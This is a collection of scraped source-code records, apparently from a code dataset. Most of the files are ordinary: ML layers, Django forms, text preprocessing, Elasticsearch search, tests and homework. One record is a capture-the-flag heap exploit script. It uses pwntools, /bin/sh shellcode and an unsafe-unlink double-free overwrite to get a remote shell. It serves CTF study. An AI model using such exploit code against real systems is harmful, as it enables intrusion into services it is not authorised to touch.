tf.cast(labels, tf.float32)\n # use weighted loss\n label_weights = self.params.multi_cls_positive_weight\n\n def _loss_fn_wrapper(x, y, from_logits=True):\n return tf.nn.weighted_cross_entropy_with_logits(x, y, pos_weight=label_weights, name='{}_loss'.format(self.problem_name))\n loss = empty_tensor_handling_loss(\n labels, logits, _loss_fn_wrapper)\n self.add_loss(loss)\n f1 = self.metric_fn(labels, logits)\n self.add_metric(f1)\n\n return tf.nn.sigmoid(\n logits, name='%s_predict' % self.problem_name)\n\n\nclass MultimodalPretrain(tf.keras.Model):\n \"\"\"Multimodal pretrain top layer.\n\n This includes following tasks:\n - Multi-modal MLM\n - Cross modal alignment\n\n \"\"\"\n\n def __init__(self, params: BaseParams, problem_name: str) -> None:\n super(MultimodalPretrain, self).__init__(name=problem_name)\n self.params = params\n self.problem_name = problem_name\n\n def call(self, input, mode):\n pass\n","sub_path":"bert_multitask_learning/top.py","file_name":"top.py","file_ext":"py","file_size_in_byte":16148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"192626983","text":"from pwn import *\n\n\nheap_size = 260\nshellcode = '\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x89\\xe2\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80'\nexit_func = 0x0804c8ac\n\nr = remote('localhost', 1234)\nr.recvuntil('[size=755]\\n')\ndata = r.recvline()\nheap_addr = int(data[data.index('=')+1:data.index('=')+8], 16)\nlog.info('heap_addr: ' + hex(heap_addr))\n\n# 
Fake chunk\r\npayload = p32(0x04eb)\r\npayload += '\\x90' * 100\r\npayload += shellcode\r\npayload += '\\x90' * (heap_size - len(payload))\r\n\r\n# Unsafe unlink exploitation through Double Free Bug\r\npayload += p32(1)\r\npayload += p32(exit_func - 8)\r\npayload += p32(heap_addr)\r\n\r\nr.sendline(payload)\r\nr.recv(4096)\r\nr.interactive()\r\n","sub_path":"2014/DEFCON/Babys_First/babyfirst-heap/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"148105051","text":"from django.forms.utils import ErrorList\nfrom django import forms\n\nfrom kanisa import conf\nfrom kanisa.forms import KanisaBaseModelForm, BootstrapDateField\nfrom kanisa.forms.widgets import (\n    KanisaMainInputWidget,\n    KanisaThumbnailFileWidget\n)\nfrom mutagen.mp3 import MP3\nfrom mutagen.easyid3 import EasyID3\nfrom mutagen.id3 import ID3NoHeaderError, TIT2\n\nfrom kanisa.models import (SermonSeries,\n                           Sermon,\n                           SermonSpeaker)\n\n\nclass SermonSeriesForm(KanisaBaseModelForm):\n    class Meta:\n        model = SermonSeries\n        widgets = {'details': KanisaMainInputWidget(),\n                   'image': KanisaThumbnailFileWidget(130, 130), }\n        fields = (\n            'title',\n            'image',\n            'intro',\n            'details',\n            'active',\n            'passage',\n        )\n\n\nclass SermonSpeakerForm(KanisaBaseModelForm):\n    class Meta:\n        model = SermonSpeaker\n        widgets = {'biography': KanisaMainInputWidget(), }\n        fields = ('forename', 'surname', 'image', 'biography', )\n\n\nclass SermonForm(KanisaBaseModelForm):\n    date = BootstrapDateField()\n    no_mp3 = forms.BooleanField(\n        initial=False,\n        required=False,\n        widget=forms.HiddenInput\n    )\n\n    class Meta:\n        model = Sermon\n        widgets = {'details': KanisaMainInputWidget(),\n                   'transcript': KanisaMainInputWidget()}\n        fields = (\n            'title',\n            'date',\n            'series',\n            'speaker',\n            'passage',\n            'mp3',\n            'details',\n            'transcript',\n            'no_mp3',\n        )\n\n    def apply_id3(self, cleaned_data):\n        try:\n            audio = EasyID3(self.files['mp3'].temporary_file_path())\n        except ID3NoHeaderError:\n            audio = MP3(self.files['mp3'].temporary_file_path())\n            audio[\"TIT2\"] = TIT2(encoding=3, text=[cleaned_data['title']])\n            audio.save()\n            audio = EasyID3(self.files['mp3'].temporary_file_path())\n\n        audio = EasyID3(self.files['mp3'].temporary_file_path())\n        audio['title'] = cleaned_data['title']\n        audio['artist'] = unicode(cleaned_data['speaker'])\n\n        if not cleaned_data['series']:\n            album_title = 'Sermons from %s' % conf.KANISA_CHURCH_NAME\n        else:\n            album_title = unicode(cleaned_data['series'])\n\n        audio['album'] = album_title\n\n        audio['albumartistsort'] = conf.KANISA_CHURCH_NAME\n        audio['organization'] = conf.KANISA_CHURCH_NAME\n        audio['genre'] = 'Speech'\n\n        # Not sure if this date format is right - the MP3 players I've\n        # got to test with don't show anything more than the year.\n        if 'date' in cleaned_data:\n            audio['date'] = cleaned_data['date'].strftime('%Y%m%d')\n\n        audio.save()\n\n    def clean(self):\n        super(SermonForm, self).clean()\n        cleaned_data = self.cleaned_data\n\n        if 'mp3' in self.files:\n            if hasattr(self.files['mp3'], 'temporary_file_path'):\n                audio = MP3(self.files['mp3'].temporary_file_path())\n            else:\n                # You probably need to set FILE_UPLOAD_HANDLERS to\n                # django.core.files.uploadhandler.TemporaryFileUploadHandler\n                audio = None\n\n            if audio is None or not audio.info or audio.info.sketchy:\n                errors = ErrorList(['Please upload a valid MP3.'])\n                self._errors[\"mp3\"] = errors\n                del cleaned_data[\"mp3\"]\n            else:\n                self.apply_id3(cleaned_data)\n        else:\n            show_mp3_warning = not 
self.cleaned_data.get(\"no_mp3\", False)\n            if not self.instance.pk and show_mp3_warning:\n                # We've got no MP3 file, and we've not seen this error\n                # before - let's check that was intentional.\n                self.data[\"no_mp3\"] = True\n                raise forms.ValidationError(\n                    'No MP3 was uploaded - if that was intentional, please '\n                    'click \\'Save Sermon\\' again.')\n\n        return cleaned_data\n","sub_path":"kanisa/forms/sermons.py","file_name":"sermons.py","file_ext":"py","file_size_in_byte":4112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"18350968","text":"'''Some useful RegEx'''\nimport re\nimport pandas as pd\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nfrom nltk.stem import PorterStemmer\n\n# Stemmer\nps = PorterStemmer()\n\n# Stop words\nSTOP_WORDS = stopwords.words('english')\n\n# Regex for emails (split with implicit string concatenation; a trailing backslash\n# inside a raw string would leave a literal backslash, newline and indentation\n# inside the pattern and stop it from ever matching)\nEMAIL_RE = re.compile(r'^([a-zA-Z0-9_\\-\\.]+)'\n                      r'@((\\[[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.)'\n                      r'|(([a-zA-Z0-9\\-]+\\.)+))'\n                      r'([a-zA-Z]{2,4}|[0-9]{1,3})'\n                      r'(\\]?)$')\n\n\n# Regex for web addresses\nWEB_ADDR_RE = re.compile(r'(https?:\\/\\/(?:www\\.|(?!www))'\n                         r'[a-zA-Z0-9][a-zA-Z0-9-]+[a-zA-Z0-9]\\.[^\\s]{2,}'\n                         r'|www\\.[a-zA-Z0-9][a-zA-Z0-9-]+[a-zA-Z0-9]'\n                         r'\\.[^\\s]{2,}|https?:\\/\\/(?:www\\.|(?!www))'\n                         r'[a-zA-Z0-9]+\\.[^\\s]{2,}'\n                         r'|www\\.[a-zA-Z0-9]+\\.[^\\s]{2,})')\n\n\n# Regex for punctuations/symbols\nSYMBOLS_RE = re.compile(r'[^\\w\\s]')\n\n# Leading and trailing white spaces\nLEAD_TRAIL_SPACE_RE = re.compile(r'^\\s+|\\s+$')\n\n# Excessive white spaces\nSPACE_RE = re.compile(r'\\s+')\n\n# Numbers and decimal numbers\nDEC_RE = re.compile(r'[0-9]+(\\.[0-9]+)?')\n\n\ndef clean_text(dfs):\n    '''\n    Clean text by applying the above RegExs\n\n    Args:\n        dfs: categorical dataframe series to clean\n\n    Returns:\n        text: clean dataframe series\n    '''\n    text = dfs\n\n    # Lowercase\n    text = text.apply(lambda x: x.lower())\n\n    # Remove e-mail addresses\n    text = text.apply(lambda x: EMAIL_RE.sub('', x))\n\n    # Remove web addresses\n    text = text.apply(lambda x: WEB_ADDR_RE.sub('', x))\n\n    # Remove symbols\n    text = text.apply(lambda x: SYMBOLS_RE.sub('', x))\n\n    # Remove numbers\n    text = text.apply(lambda x: DEC_RE.sub('', x))\n\n    # Remove leading and trailing whitespaces\n    text = text.apply(lambda x: LEAD_TRAIL_SPACE_RE.sub('', x))\n\n    # Remove excessive whitespaces in the middle\n    text = text.apply(lambda x: SPACE_RE.sub(' ', x))\n\n    # Remove stop words\n    # Tokenize each sentence (row)\n    # Create a list of the tokens if these tokens are not stop words\n    # Convert each row (which is a list of tokens) back to a string (a sentence)\n    text = text.apply(lambda x: ' '.join([t for t in word_tokenize(x) if t not in STOP_WORDS]))\n\n    # Stemming\n    text = text.apply(lambda x: ' '.join([ps.stem(t) for t in word_tokenize(x)]))\n\n    # Return the clean text\n    return text\n","sub_path":"ML DS DL/preprocess_text_data.py","file_name":"preprocess_text_data.py","file_ext":"py","file_size_in_byte":2500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"82835166","text":"from __future__ import print_function\r\nimport sys\r\nimport requests\r\nfrom elasticsearch import Elasticsearch\r\nimport json\r\nfrom pprint import pprint\r\nimport re\r\nimport nltk\r\nimport heapq\r\n\r\nclass Ticket:\r\n    def __init__(self):\r\n        self.incidentId=None\r\n        self.description=None\r\n        self.summary=None\r\n        self.status=None\r\n        self.issueType=None\r\n        self.componentName=None\r\n        
self.application=None\r\n\r\n\r\ntry:\r\n es=Elasticsearch([{'host':'localhost','port':9200}])\r\nexcept:\r\n print(\"failed to connect to elasticsearch service\")\r\n# search for the ticket id \r\nincidentId=\"INFNIA-3929\"\r\nres=es.search(index=\"ticket\",doc_type='ticketsnia',body={'query':{'match_phrase':{\r\n 'incidentId':incidentId\r\n }}})\r\nt1=Ticket()\r\nfor hit in res['hits']['hits']:\r\n t1.incidentId=hit['_source']['incidentId']\r\n t1.description=hit['_source']['description']\r\n t1.summary=hit['_source']['summary']\r\n t1.status=hit['_source']['status']\r\n t1.issueType=hit['_source']['issueType']\r\n t1.componentName=hit['_source']['componentName']\r\n t1.application=hit['_source']['application']\r\n\r\n\r\nclass Result:\r\n def __init__(self):\r\n self.incidentId=None\r\n self.score=0\r\n self.summary=None\r\n\r\ndef summerization_Text(text):\r\n article_text = text\r\n # Removing Square Brackets and Extra Spaces\r\n article_text = re.sub(r'\\[[0-9]*\\]', ' ', article_text) \r\n article_text = re.sub(r'\\s+', ' ', article_text) \r\n # Removing special characters and digits\r\n formatted_article_text = re.sub('[^a-zA-Z]', ' ', article_text ) \r\n formatted_article_text = re.sub(r'\\s+', ' ', formatted_article_text) \r\n #converting text to sentences\r\n sentence_list = nltk.sent_tokenize(article_text) \r\n stopwords = nltk.corpus.stopwords.words('english')\r\n notstopword=['not','down','up']\r\n stopwords2=[]\r\n for word in stopwords:\r\n if word not in notstopword:\r\n stopwords2.append(word)\r\n stopwords=stopwords2\r\n sentTokens=[]\r\n for word in nltk.word_tokenize(formatted_article_text): \r\n if word not in stopwords:\r\n sentTokens.append(word)\r\n summary=' '.join(sentTokens)\r\n return summary\r\n\r\n\r\ndef elasticsearch_Searching_Phrase(tkts):\r\n re=es.search(index=\"ticket\",doc_type='ticketsnia',body={\r\n \"size\":20,\r\n \"query\":{\r\n \"bool\":{\r\n \"must\":[\r\n {\"match_phrase\":{\"description\":{\"query\":tkts.description,\"fuzziness\":\"Auto\"}}},\r\n {\"match_phrase\":{\"summary\":{\"query\":tkts.summary,\"fuzziness\":\"Auto\"}}},\r\n {\"match_phrase\":{\"componentName\":tkts.componentName}}\r\n ],\r\n \"should\":[\r\n {\"match\":{\"issueType\":tkts.issueType}},\r\n {\"match\":{\"status\":tkts.status}}\r\n ]\r\n \r\n }\r\n }\r\n })\r\n score1=[]\r\n id1=[]\r\n for hit in re['hits']['hits']:\r\n tkt1=Result()\r\n tkt1.incidentId=hit['_source']['incidentId']\r\n tkt1.score=hit['_score']\r\n tkt1.summary=hit['_source']['summary']\r\n score1.append(tkt1)\r\n id1.append(hit['_id'])\r\n return score1,id1\r\n\r\n\r\ndef elasticsearch_Searching(tkts):\r\n re=es.search(index=\"ticket\",doc_type='ticketsnia',body={\r\n \"size\":20,\r\n \"query\":{\r\n \"bool\":{\r\n \"must\":[\r\n {\"match\":{\"description\":tkts.description}},\r\n {\"match\":{\"summary\":tkts.summary}},\r\n {\"match\":{\"componentName\":tkts.componentName}}\r\n ],\r\n \"should\":[\r\n {\"match\":{\"issueType\":tkts.issueType}},\r\n {\"match\":{\"status\":tkts.status}}\r\n ]\r\n \r\n }\r\n }\r\n })\r\n score1=[]\r\n id1=[]\r\n for hit in re['hits']['hits']:\r\n tkt1=Result()\r\n tkt1.incidentId=hit['_source']['incidentId']\r\n tkt1.score=hit['_score']\r\n tkt1.summary=hit['_source']['summary']\r\n id1.append(hit['_id'])\r\n score1.append(tkt1)\r\n return score1,id1 \r\n\r\n\r\n\r\n\r\n\r\nres1,id1=elasticsearch_Searching_Phrase(t1)\r\nif len(res1)==0:\r\n t1.description=summerization_Text(t1.description)\r\n res1,id1=elasticsearch_Searching(t1)\r\nmsg=''\r\nfor i in res1:\r\n 
msg+=i.incidentId+\" \"+(str)(i.score)+\" \"+i.summary+\"\\n\"\r\nprint(\"incidentId \\t score \\t summary\")\r\nprint(msg)\r\nprint(id1)\r\nprint(\"################################################################################################\")\r\nt2=Ticket()\r\nt2.description=\"problem we had previously in INFNIA-3924 is being repeated. Could you please help\"\r\nt2.summary=\"Stopping at login not able to login\"\r\nt2.componentName=\"CAS/Admin\"\r\nt2.issueType=\"Incident\"\r\nt2.status=\"Resolved closed\"\r\nres1,id1=elasticsearch_Searching_Phrase(t2)\r\nif len(res1)==0:\r\n    t2.description=summerization_Text(t2.description)\r\n    res1,id1=elasticsearch_Searching(t2)\r\nmsg=''\r\nfor i in res1:\r\n    msg+=i.incidentId+\" \"+(str)(i.score)+\" \"+i.summary+\"\\n\"\r\nprint(\"incidentId \\t score \\t summary\")\r\nprint(msg)\r\nprint(id1)","sub_path":"similiartickts.py","file_name":"similiartickts.py","file_ext":"py","file_size_in_byte":5164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"553241616","text":"from os import name\nfrom os import system\nfrom typing import List\nfrom os.path import isfile\n\n\ndef parse(file_path: str) -> List[int]:\n    fp = open(file_path)\n    line = fp.readline()\n    if not line:\n        print(\"empty file\")\n        return\n    res = list()\n    while line:\n        if line.count(':') == 6:\n            split = list(filter(lambda x: x != '', line.split(' ')))\n            if split[6] != '0':\n                if split[6][-1] == 'k':\n                    res.append(int(split[6][0:-1]))\n                else:\n                    res.append(int(int(split[6])/1000))\n        line = fp.readline()\n    return res\n\n\ndef plot(data: List[int]) -> None:\n    try:\n        import matplotlib.pyplot as pp\n        pp.plot(data)\n        pp.xlabel('Time passed in s')\n        pp.ylabel('Download in MB/s')\n        pp.grid()\n        pp.show()\n    except ImportError:\n        print(\"Matplotlib not installed, skipping printing\")\n\n\ndef handle(file_path: str, source: str):\n    if input(\"just parse existing data? [Y/n]: \") != 'n':\n        if not isfile(file_path):\n            print(\"logfile does not exist\"); exit(0)\n        data = parse(file_path)\n        plot(data)\n        exit(0)\n\n    # posix system only\n    if name != 'posix':\n        print(\"use a posix system. shutting down\")\n        exit(1)\n\n    if isfile(file_path):\n        if input(\"Delete old file?[y/N]: \") == 'y':\n            system(\"rm \" + file_path)\n\n    while True:\n\n        system('curl --max-time 10000 -o /dev/null ' + source + '://rogue-01.cs.uni-bonn.de/PA.log >> ' + file_path + ' 2>&1')\n\n        data = parse(file_path)\n        plot(data)\n\n        print(\"do you want to continue? [Y/n]\")\n        if input() == 'n':\n            exit(0)\n\n\nvar = input(\"Mode? 
[h]ttp/[f]tp: \")\nif var == 'h':\n file_path = 'web.logs'\n source = 'http'\nelif var == 'f':\n file_path = 'ftp.logs'\n source = 'ftp'\nelse:\n print(\"error\")\n exit(0)\nhandle(file_path, source)\n","sub_path":"practical/Exercise 2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"555641843","text":"import unittest\nfrom braphy.graph_measures.measure_parser import MeasureParser\nfrom braphy.graph_measures.measure_triangles import MeasureTriangles\nfrom braphy.graph import *\nimport numpy as np\n\nclass TestTriangles(unittest.TestCase):\n def test_graphBD(self):\n measure_list = MeasureParser.list_measures()\n A = np.array([[0,0,1,0],[1,0,0,1],[0,1,0,1],[0,0,0,0]])\n graph_bd = GraphBD(A, measure_list[GraphBD], 'zero')\n MeasureTriangles.compute_measure(graph_bd)\n self.assertSequenceEqual(graph_bd.measure_dict[MeasureTriangles]['triangles'].tolist(),\n [1, 1, 1, 0])\n\n def test_graphBU(self):\n measure_list = MeasureParser.list_measures()\n A = np.array([[0,0,1,0,0],[1,0,0,1,0],[0,1,0,1,0],[0,0,0,0,1],[0,0,0,1,0]])\n graph_bu = GraphBU(A, measure_list[GraphBU], 'zero', 'max')\n MeasureTriangles.compute_measure(graph_bu)\n self.assertSequenceEqual(graph_bu.measure_dict[MeasureTriangles]['triangles'].tolist(),\n [1, 2, 2, 1, 0])\n\n def test_graphWD(self):\n measure_list = MeasureParser.list_measures()\n A = np.array([[0,0,0.1,0.8],[0.5,0,0,0.2],[0,0.1,0,0.4],[0,0,0,0]])\n graph_wd = GraphWD(A, measure_list[GraphWD], 'zero')\n MeasureTriangles.compute_measure(graph_wd)\n for i in range(len(A[0])):\n self.assertAlmostEqual(graph_wd.measure_dict[MeasureTriangles]['triangles'].tolist()[i], [0.0855, 0.0855, 0.0855, 0][i], places=4)\n\n def test_graphWU(self):\n measure_list = MeasureParser.list_measures()\n A = np.array([[0,0.5,0.1,0.8],[0.5,0,0.1,0.2],[0.1,0.1,0,0.4],[0.8,0.2,0.4,0]])\n graph_wu = GraphWU(A, measure_list[GraphWU], 'zero', 'max')\n MeasureTriangles.compute_measure(graph_wu)\n for i in range(len(A[0])):\n self.assertAlmostEqual(graph_wu.measure_dict[MeasureTriangles]['triangles'].tolist()[i], [0.9194, 0.8019, 0.6885, 0.9484][i], places=4)\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test/test_triangles.py","file_name":"test_triangles.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"86639129","text":"\nfrom collections import defaultdict\n\nfrom PySide2.QtCore import Qt\nfrom .widgets.qsmart_dockwidget import QSmartDockWidget\n\n\nclass ViewManager:\n \"\"\"\n Manages views.\n \"\"\"\n def __init__(self, workspace):\n self.workspace = workspace\n self.views = [ ]\n self.docks = [ ]\n self.view_to_dock = { }\n self.views_by_category = defaultdict(list)\n\n @property\n def main_window(self):\n return self.workspace._main_window\n\n def add_view(self, view, caption, category):\n \"\"\"\n Add a view to this workspace.\n\n :param view: The view to add.\n :param str caption: The caption of the view.\n :param str category: The category of the view.\n :return: None\n \"\"\"\n\n docking_positions = {\n 'left': Qt.LeftDockWidgetArea,\n 'right': Qt.RightDockWidgetArea,\n 'top': Qt.TopDockWidgetArea,\n 'bottom': Qt.BottomDockWidgetArea,\n }\n\n self.views_by_category[category].append(view)\n\n dock = QSmartDockWidget(caption, parent=view)\n dock_area = docking_positions.get(view.default_docking_position, Qt.RightDockWidgetArea)\n if 
view.default_docking_position == 'right':\n self.main_window.central_widget.addDockWidget(dock_area, dock)\n retab = True\n else:\n self.main_window.addDockWidget(dock_area, dock)\n retab = False\n dock.setWidget(view)\n\n self.views.append(view)\n self.docks.append(dock)\n self.view_to_dock[view] = dock\n\n if retab:\n self.tabify_right_views()\n\n def raise_view(self, view):\n \"\"\"\n Find the dock widget of a view, and then bring that dock widget to front.\n\n :param BaseView view: The view to raise.\n :return: None\n \"\"\"\n\n # find the dock widget by the view\n dock = self.view_to_dock.get(view, None)\n if dock is None:\n return\n\n dock.raise_()\n\n def first_view_in_category(self, category):\n \"\"\"\n Return the first view in a specific category.\n\n :param str category: The category of the view.\n :return: The view.\n \"\"\"\n\n if self.views_by_category[category]:\n return self.views_by_category[category][0]\n return None\n\n def tabify_right_views(self):\n \"\"\"\n Tabify all right-side dockable views.\n\n :return: None\n \"\"\"\n\n right_dockable_views = [dock for dock in self.docks\n if dock.widget().default_docking_position == 'right']\n\n for d0, d1 in zip(right_dockable_views, right_dockable_views[1:]):\n self.workspace._main_window.central_widget.tabifyDockWidget(d0, d1)\n right_dockable_views[0].raise_()\n","sub_path":"angrmanagement/ui/view_manager.py","file_name":"view_manager.py","file_ext":"py","file_size_in_byte":2857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"69110761","text":"import configparser\nfrom datetime import datetime\nfrom ors.script import converter\nimport pytz\n\ndef read_config():\n config_file_path = 'conf/ors.conf'\n config_object = configparser.ConfigParser()\n config_object.read(config_file_path, 'utf-8')\n return config_object\n\ndef datetime_now():\n return datetime.now(pytz.timezone('UTC'))\n\ndef datetime_now_str():\n return datetime.now(pytz.timezone('UTC')).strftime('%Y-%m-%d %H:%M:%S')\n\ndef get_beatmap_info(beatmap_md5, mode):\n from ors.script.database import Database\n database = Database()\n connection = database.get_connection()\n result = database.execute_statement(connection, 'm_beatmaps_S01', beatmap_md5)\n count = result[0]\n if count == 0:\n from ors.script.ripple_api import RippleApi\n ripple_api = RippleApi()\n beatmap_info = ripple_api.get_beatmap_info(beatmap_md5, mode)\n beatmap_info = converter.convert_beatmap_peppy(beatmap_info[0])\n result = database.execute_statement_values(connection, 'm_beatmaps_I01', beatmap_info.values())\n connection.commit()\n connection.close()\n return beatmap_info\n else:\n return result[1][0]\n\ndef count_up_api_request():\n from ors.script.database import Database\n from ors.script import util\n database = Database()\n connection = database.get_connection()\n now = util.datetime_now_str()\n result = database.execute_statement(connection, 's_api_request_count_tick_S01', now)\n is_exists = result[0]\n if is_exists == 0:\n result = database.execute_statement(connection, 's_api_request_count_tick_I01', now)\n else:\n count = result[1][0]['count']\n count = count + 1\n result = database.execute_statement(connection, 's_api_request_count_tick_U01', count, now)\n connection.commit()\n connection.close()\n","sub_path":"ors/script/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"463437735","text":"'''\nCreated on 
2020/07/10\n\n@author: ukai\n'''\nimport os\nimport unittest\n\nfrom agent import Agent\nfrom build_parameter import BuildParameter\nfrom build_parameter_factory import BuildParameterFactory\nfrom store import Store\nfrom store_field import StoreField\n\n\nclass Test(unittest.TestCase):\n \n @classmethod\n def setUpClass(cls):\n super(Test, cls).setUpClass()\n cls.dbPath = \"testDb.sqlite\"\n if os.path.exists(cls.dbPath):\n os.remove(cls.dbPath)\n\n\n @classmethod\n def tearDownClass(cls):\n super(Test, cls).tearDownClass()\n if os.path.exists(cls.dbPath):\n os.remove(cls.dbPath)\n\n \n def setUp(self):\n unittest.TestCase.setUp(self)\n \n\n def test001(self):\n \n buildParameter = BuildParameter()\n buildParameterMemento = buildParameter.createMemento()\n \n buildParameterFactory = BuildParameterFactory()\n buildParameterAnother = buildParameterFactory.create()\n \n assert buildParameter.__dict__ != buildParameterAnother.__dict__\n \n buildParameterAnother.loadMemento(buildParameterMemento)\n \n assert buildParameter.__dict__ == buildParameterAnother.__dict__\n \n def test002(self):\n \n store = Store(self.dbPath)\n assert isinstance(store, Store)\n \n for k1 in range(2**3):\n buildParameter = BuildParameter(label = \"test\" + str(k1))\n agent = Agent()\n\n for epoch in range(2**4): \n \n agentMemento = agent.createMemento()\n buildParameterMemento = buildParameter.createMemento()\n buildParameterKey = buildParameter.key \n buildParameterLabel = buildParameter.label\n \n storeField = StoreField(agentMemento, epoch, buildParameterMemento, buildParameterKey, buildParameterLabel)\n assert isinstance(storeField, StoreField)\n \n store.append(storeField)\n\n store.update_db()\n \n for storeField in store.restore(\"test%\", 1):\n assert isinstance(storeField, StoreField)\n\nif __name__ == \"__main__\":\n #import sys;sys.argv = ['', 'Test.test001']\n unittest.main()","sub_path":"framework/test_store.py","file_name":"test_store.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"232697712","text":"# coding: utf8\nfrom django.urls import path\nfrom .v1 import views as views_v1\n\n\"\"\"\n Location model API v1 URLs\n\"\"\"\nurlpatterns_v1_locations = ([\n path('',\n views_v1.LocationListCreateView.as_view(),\n name='v1_list_create_location'),\n path('',\n views_v1.LocationDetailView.as_view(),\n name='v1_detail_location'),\n ], 'locations')\n\n\n\"\"\"\n Station model API v1 URLs\n\"\"\"\nurlpatterns_v1_stations = ([\n path('',\n views_v1.StationListCreateView.as_view(),\n name='v1_list_create_station'),\n path('',\n views_v1.StationDetailView.as_view(),\n name='v1_detail_station'),\n ], 'stations')\n\n","sub_path":"apps/stations/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"383218464","text":"#soc01hw\r\n\r\n#A Few Things to Try\r\n#1 Write a program that tells you the following:\r\n#How many hours are in a year?\r\ndef isleapyear(year):\r\n if year % 4 == 0 and (year % 100 != 0 or year % 400 == 0):\r\n return True\r\n return False\r\nyear =int(input('Enter a year:'))\r\nif isleapyear(year):\r\n print(f\"There are {366*24} hours in year {year}.\")\r\nelse:\r\n print(f'There are {365*24} hours in year {year}.')\r\n\r\nx=input (\"Press any key to next homework\")\r\n\r\n#- Minutes in a decade. 
How many minutes are in a decade?\r\nprint(f'There are {10*365*24*60} minutes in a decade.')\r\n\r\nx=input (\"Press any key to next homework\")\r\n#- Your age in seconds. How many seconds old are you? (I'm not going to check your answer, so be as accurate—or not—as you want.)\r\nprint(f'I am {40*365*24*60*60} seconds old.')\r\n\r\nx=input (\"Press any key to next homework\")\r\n#- Andreea Visanoiu: I'm 48618000 seconds old hahaha. Calculate @Andreea Visanoiu's age.\r\nprint(f'Andreea Visanoiu is {48618000/(365*24*60*60)} years old.')\r\n\r\nx=input (\"Press any key to next homework\")\r\n\r\n#Here are some tougher questions: - How many days does it take for a 32-bit system to timeout, if it has a bug with integer overflow?\r\nprint(f'It takes {pow(2,32)/(24*60*60*1000)} days for a 32-bit system to timeout.')\r\n\r\nx=input (\"Press any key to next homework\")\r\n\r\n#How about a 64-bit system?\r\nprint(f'It takes {pow(2,64)/(24*60*60*1000)} days for a 64-bit system to timeout.')\r\n\r\nx=input (\"Press any key to next homework\")\r\n\r\n#Calculate your age accurately based on your birthday (maybe use time of day e.g. 8:23am\r\n#if you know it, use 12:00 noon midday) - you will need Python modules.\r\n\r\nimport datetime\r\ndelta = datetime.datetime.now()-datetime.datetime(1980, 7, 6, 12, 0)\r\nprint (f'My exact age is {delta.days} days and {delta.seconds} seconds')\r\n\r\nx=input (\"Press any key to next homework\")\r\n#Write a program that asks for a person’s first name, then middle, and then last. \r\n#Finally, it should greet the person using their full name.\r\n\r\nfirstname = input(\"Enter your first name please:\")\r\nmiddlename = input(\"Enter your middle name please:\")\r\nlastname = input(\"Enter your last name please:\")\r\nprint(f\"Hello {firstname} {middlename} {lastname}. It was nice meeting you!\")\r\n\r\nx=input (\"Press any key to next homework\")\r\n\r\n#Write a program that asks for a person’s favorite number. Have your program add 1 to the\r\n# number, and then suggest the result as a bigger and better favorite number. \r\n# (Do be tactful about it, though.)\r\n\r\nnum = input(\"Enter your favorite number: \")\r\ntry:\r\n    val = int(num)\r\n    print(f\"A better number is: {val+1}\")\r\nexcept ValueError:\r\n    print(\"Please enter a number!\")\r\n\r\nx=input (\"Press any key to next homework\")\r\n\r\n#Write an angry boss program that rudely asks what you want. Whatever you answer, the angry\r\n#boss should yell it back to you and then fire you. For example, if you type in I want\r\n#a raise, it should yell back like this: 'WHADDAYA MEAN \"I WANT A RAISE\"?!? YOU'RE FIRED!!'\r\n\r\n\r\nquestion = input(\"What do you want?\")\r\nprint(f\"\\'WHADDAYA MEAN \\\"{question.upper()}\\\"?!? 
YOU'RE FIRED!!\\'\")\r\n\r\nx=input (\"Press any key to next homework\")\r\n\r\n#Here’s something for you to do in order to play around more with center, ljust, and rjust: \r\n#write a program that will display a table of contents (see day3.md to review the format)\r\n\r\nprint(\"Table of Contents\")\r\nprint(\"\")\r\nprint(\"Chapter 1: Getting Started\".ljust(30,\" \")+\"page 1\".ljust(20,\" \"))\r\nprint(\"Chapter 2: Numbers\".ljust(30,\" \")+\"page 9\".ljust(20,\" \"))\r\nprint(\"Chapter 3: Letters\".ljust(30,\" \")+\"page 13\".ljust(20,\" \"))\r\n\r\nx=input (\"Press any key to next homework\")\r\n\r\n#Write a program that prints out the lyrics to that beloved classic, “99 Bottles of Beer on the Wall.”\r\n\r\ni = 99\r\nwhile i>0:\r\n    print(f'{i} bottles of beer on the wall, {i} bottles of beer.')\r\n    i=i-1\r\n    if i>0:\r\n        print(f'Take one down and pass it around, {i} bottles of beer on the wall.')\r\n    else:\r\n        print('Take one down and pass it around, no more bottles of beer on the wall.')\r\n    print(\" \")\r\nprint(\"No more bottles of beer on the wall, no more bottles of beer.\") \r\nprint(\"Go to the store and buy some more, 99 bottles of beer on the wall.\")\r\n \r\nx=input (\"Press any key to next homework\")\r\n\r\n#Whatever you say to Grandma (whatever you type in), she should respond with this: \r\n#HUH?! SPEAK UP, GIRL! unless you shout it (type in all capitals). \r\n#If you shout, she can hear you (or at least she thinks so) and yells back: \r\n#NO, NOT SINCE 1938! \r\n#To make your program really believable, have Grandma shout a different year each 